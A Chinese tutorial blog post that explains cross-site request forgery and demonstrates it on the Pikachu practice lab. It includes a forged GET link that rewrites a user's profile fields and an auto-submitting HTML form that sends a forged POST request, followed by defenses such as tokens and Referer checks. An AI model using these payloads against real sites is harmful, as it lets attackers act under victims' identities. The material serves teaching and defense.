CSRF“苏醒的巨人”

最新推荐文章于 2021-10-31 20:56:03 发布
最新推荐文章于 2021-10-31 20:56:03 发布
阅读量186 收藏
点赞数 3
分类专栏: web安全基础 文章标签: csrf web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49821579/article/details/115151131
版权

1、小场面

  1. 场景一:我点击了一个好友转发的qq空间消息,怎么莫名其妙自己也转发了???
  2. 场景二:我点击了一个不可描述的网页,然后自己的账号做了一些不可描述的操作???

2、CSRF简介

上面两个场面其实就是利用了 CSRF(Cross Site Request Forgery),即跨站请求伪造。攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,达到攻击目的。可以这么理解:攻击者盗用了你的身份,以你的名义进行某些不可描述的操作。

想象一下,它可以以你的名义发邮件、发消息、转账、修改密码、删除文章/留言/评论…属实可恶!

CSRF 与 XSS 相比,虽然 CSRF 攻击不太流行,但却更加难以防范,所以被认为 CSRF 比 XSS 更具危险性,CSRF 在业内具有“苏醒的巨人”的称号。

3、CSRF原理

一般来说,用户完成以下两个操作,就有可能遭受CSRF攻击。

  1. 登录信任网站A,并在本地生成Cookie。
  2. 在不登出A的情况下,访问危险网站B。

4、CSRF测试

pikachu漏洞练习平台之CSRF

4.1、GET方式

​ ① 用户甲登录信任网站,查看个人信息。

image-20210323205127914

​ ② 攻击者构造恶意的链接,并将其发送给用户甲。

通过抓包可见,修改个人信息后提交的请求方法是GET。

image-20210323211923048

URL里面的四个参数都可以被修改,直接构造URL为:

http://192.168.101.66/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=x&phonenum=000000&add=Mars&email=123@123.com&submit=submit

​ ③ 攻击者通过社工等手段引诱用户甲点击这个链接。如果用户甲此时登录状态或cookie/session没有过期,则他的信息就被修改了。

image-20210323212754122

可以看到,个人信息内容按照恶意链接的设置被修改了,而用户甲仅点击了那个不明链接。

4.2、POST方式

​ ① 同样,用户乙登录了他信任的网站,一切正常。

image-20210323213429091

​ ② 攻击者构造恶意的链接,并将其发送给用户乙。

抓包可见这次的请求方式是POST,URL不再显示修改参数,所以无法再使用上述办法(即通过URL来伪造请求)进行修改。

image-20210323213939444

但可以自行创建一个恶意表单,让用户点击这个表单的URL,通过此表单向存在CSRF漏洞的页面去提交POST请求。

<!DOCTYPE html>
<html>
<head lang="en">
	<title>csrf_post</title>
	<script>
    window.onload = function() {
    document.getElementById("postsubmit").click();
  }
    </script>
</head>
<body>
       <form action="http://localhost/pikachu/vul/csrf/csrfpost/csrf_post_edit.php"  method="POST">
       	 <input type="text" name="sex" value="1"><br>
       	 <input type="hidden" name="phonenum" value="hacker"><br>
       	 <input type="hidden" name="add" value="china"><br>
       	 <input type="hidden" name="email" value="hacker"><br>
       	 <input id="postsubmit" type="submit" name="submit" value="submit" />
       </form>
</body>
</html>

​ ③ 用户乙点击了这个恶意表单的链接后,其个人信息被修改。

image-20210323215151210

5、CSRF防御

​ ① 尽量使用POST

GET接口太容易被拿来做CSRF攻击,接口最好限制为POST使用,降低攻击风险。

当然POST并不是万无一失,攻击者只要构造一个form就可以,但需要在第三方页面做,这样就增加暴露的可能性。

​ ② 二次验证

在通常情况下,验证码能很好遏制CSRF攻击。当用户收到验证码提示后,可能会心存怀疑,就不会乖乖中招。但是出于用户体验考虑,网站不能给所有的操作都加上验证码。

​ ③ Referer Check

Referer Check在Web最常见的应用就是“防止图片盗链”。同理,Referer Check也可以被用于检查请求是否来自合法的“源”(Referer值是否是指定页面,或者网站的域),如果都不是,那么就极可能是CSRF攻击。

但是因为服务器并不是什么时候都能取到Referer,所以也无法作为CSRF防御的主要手段。

​ ④ Token认证

Token 即标志,记号的意思,也叫作令牌。

例子:

  1. 用户访问某个表单页面。
  2. 服务端生成一个Token,放在用户的Session中,或者浏览器的Cookie中。
  3. 在页面表单附带上Token参数。
  4. 用户提交请求后, 服务端验证表单中的Token是否与用户Session(或Cookies)中的Token一致,一致为合法请求,不是则非法请求。

这个Token的值必须是随机的,不可预测的。由于Token的存在,攻击者无法再构造一个带有合法Token的请求实施CSRF攻击。另外使用Token时应注意Token的保密性,尽量把敏感操作由GET改为POST,以form或AJAX形式提交,避免Token泄露。

CSRF的Token仅仅适用于对抗CSRF攻击。当网站同时存在XSS漏洞时候,那这个方案也是空谈。因为攻击者可以通过js获取Token值。

6、参考资料

[1] Pikachu之CSRF

[2] Web安全之CSRF攻击

wawyw~
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSrf攻击-苏醒巨人
09-16
CSrf攻击-苏醒巨人
苏醒巨人----CSRF
diecai2192的博客
05-04 195
一.CSRF 跨站请求伪造(Cross-Site Request Forgery,CSRF)是指利用 受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点 击恶意链接或者访问包含攻击代码的页面,在受害人不知情的 情况下以受害者的身份向(身份认证信息所对应的)服务器发 送请求,从而完成非法操作(如转账、改密等) 1.可能出现的地方 所有的业务点都需要进行测试 1. 转账 2. 修...
CSRF漏洞
qq_53086690的博客
04-20 120
CSRF简介   CSRF是跨站请求伪造,虽然CSRF听起来像XSS跨站脚本攻击,但是两者完全不相同。CSRF不太流行但是更难防范。CSRF在业内有"苏醒巨人"的称号。   可以这么理解CSRF:攻击者盗用了你的身份,以你的名义来做一些非法的操作。CSRF能够用你的账户发邮件,获取你的敏感信息,甚至盗走你的钱财。 CSRF攻击原理   当我们打开或登录某个网站后,浏览器与网站所存放的服务器将会产生一个会话,在这个会话没有结束时,你就可以用你的权限对网站进行某种操作。(网站已经存储了你的登录信息[如Cooki
csrf攻击
3569
06-28 337
原理 : 设计代码者 ,在对数据库进行增删改查时,传递的参数 简单,任何人只要访问指定的 网址,便可以利用当前操作者的身份进行操作。 例子 : A 站存在 CSRF漏洞 (增加管理员一处参数过于简单,没有验证),B站是攻击者的服务器  管理员登陆账户后 在A 站浏览 检查, 攻击者在A站上边发了个 诱惑性的网站链接 ,比如:         我是XXX ,我好寂寞, 快点我~
CSRF攻击
weixin_30952103的博客
07-09 58
求助编辑百科名片 CSRF(Cross-site request forgery跨站请求伪造,也被称成为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与X...
CSRF漏洞详细说明
02-26
Cross-SiteRequestForgery(CSRF),中文一般译作跨站请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。...
CSRF课程.pdf
01-25
CSRF课程
Shiro开启CSRF表单防护
12-08
Shiro开启CSRF表单防护
csrf攻击与防范
weixin_33872566的博客
05-16 347
CSRF(Cross Site Request Forgeries)跨网站请求伪造,也叫XSRF,通过伪装来自受信任用户的请求来攻击利用受信任网站。 与对比 xss:本网站运行了来自其它网站的脚本 csrf:其它网站对本网站产生了影响 一、攻击 利用用户登录态伪造http请求。  危害: 盗取用户资金(网上银行,购物) 冒充用户发帖(广告帖) 损坏网站名誉 ...
什么是CSRF?可能多数人都不清楚,没事,一起来了解!!!
热门推荐
lajos的博客
06-23 3万+
        CSRF即跨站请求攻击。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。因为浏览器之前认证过,所以被访问的站点会绝点是这是真正的用户操作而去运行。        这就利用了web中用户身份认证验证的一个漏洞:简单的身份验证仅仅能保证请求发自某个用户的浏览器,却不能保证请求本身是用户...
pikachu平台之csrf
qq_42728977的博客
12-16 1918
概述 参考链接 CSRF 是 Cross Site Request Forgery 的 简称,中文名为跨域请求伪造,在CSRF的攻击场景中,攻击者会伪造一个请求(一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,这个攻击也就完成了,所以CSRF攻击也被称为“one click”攻击。 场景例子 lucy想要在购物网站上修改购物地址,这个操作是lucy通过浏览器向后端发送了请求。...
csrf简单明了( 转发)
weixin_30535167的博客
07-03 108
https://www.daguanren.cc/post/csrf-introduction.html csrf_token = request.META.get('CSRF_COOKIE') request_csrf_token = request.POST.get('csrfmiddlewaretoken', '')对比这两个token,不一样就拒绝 转载于:https://www...
浅谈系列之跨站请求伪造(CSRF
hobby云说
10-31 369
一、CSRF简介 CSRF,英文全称Cross-Site Request Forgery,跨站请求伪造,坏家伙冒充用户身份执行用户操作。百度上是这么说的:是一种挟制用户在当前已登录的Web应用程序上执行非本意操作的方法。 简而言之就是,坏家伙盗用你的身份,用你的名义发送恶意的请求。突然想到几个成语,CSRF似乎都有点狐假虎威、借刀杀人的味道。 二、CSRF的危害 坏家伙可以用你的名义发邮件、发消息、买东西、转账......甚至,能假借你的名义进行一系列...
CSRF
kongjianxinxi的博客
10-25 418
CSRF 是利用用户的身份,一般是构造链接让用户点击,获取用户的cookie之后,发送post或get请求,实现操作后台数据的目的 Cookie保持机制 Session Cookie,浏览器不关闭则不失效 本地Cookie,设定时间,时间过期之后才失效 CSRF几种攻击方式 *HTML CSRF* 可以发起get请求的标签 &lt;link href = ' ' &gt; &lt;img ...
qq空间登陆 cookie_精:基于token的登陆验证机制
weixin_39622628的博客
12-04 674
session简介做过Web开发的程序员应该对Session都比较熟悉,Session是一块保存在服务器端的内存空间,一般用于保存用户的会话信息。用户通过用户名和密码登陆成功之后,服务器端程序会在服务器端开辟一块Session内存空间并将用户的信息存入这块空间,同时服务器会在cookie中写入一个Session_id的值,这个值用于标识这个内存空间。下次用户再来访问的话会带着这个cook...
关于checkmars的漏洞
zyc050707的博客
11-19 6002
1、Client Use Of JQuery Outdated Version 可将jQuery具体版本号删除; 2、Client Potential XSS 可对用户输入的进行过滤 如,编写过滤方法 String xssFilter(String value){ value = value.replaceall(">","&gt;"); ...
Web页面解析流程的学习
Wawyw's Blog
02-20 1843
WEB 页面解析的总体流程 客户端(浏览器)发起页面请求,主机对 地址中的DNS 域名进行解析,找到对应的 IP 地址,请求发送到 服务端,服务器根据请求内容发送响应给客户端,客户端收到响应,将内容渲染成网页。 1、域名解析的过程 1.1、名词解释 (1) 域名:网络是基于TCP/IP协议进行通信和连接的,每一台主机都有唯一且固定的IP地址,从而区分因特网上数量庞大的主机。IP地址是数字型的,数字较多不方便记忆,于是人们又发明了域名地址,采用字符型结构。域名地址是域的自然语言名称,它与数字式IP地址存.
SSRF漏洞学习
Wawyw's Blog
04-01 801
1、SSRF概念 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成并由服务端发起恶意请求的一个安全漏洞。正是因为恶意请求由服务端发起,而服务端能够请求到与自身相连而与外网隔绝的内部网络系统,所以一般情况下,SSRF的攻击目标是攻击者无法直接访问的内网系统。 2、SSRF的原理 SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用获取数据的功能而没有对目标地址做过滤和限制。例如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片,下
XSS漏洞学习
Wawyw's Blog
03-18 732
XSS练习靶场 在线: https://xss.haozi.me/ https://xssaq.com/yx/index.php 需下载安装: DVWA pikachu 1、XSS 跨站脚本(Cross-site Scripting )攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)。 为了避免CSS(层叠样式表)相混淆,通常称它为"XSS""。形成XSS漏洞的主要原.
python csrf
最新发布
09-19
CSRF(Cross-Site Request Forgery)是一种常见的网络安全漏洞,攻击者利用用户的身份发起恶意请求。为了防止CSRF攻击,常常需要在请求中使用CSRF-Token来验证请求的合法性。在Python中,可以通过以下几种方式获取并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值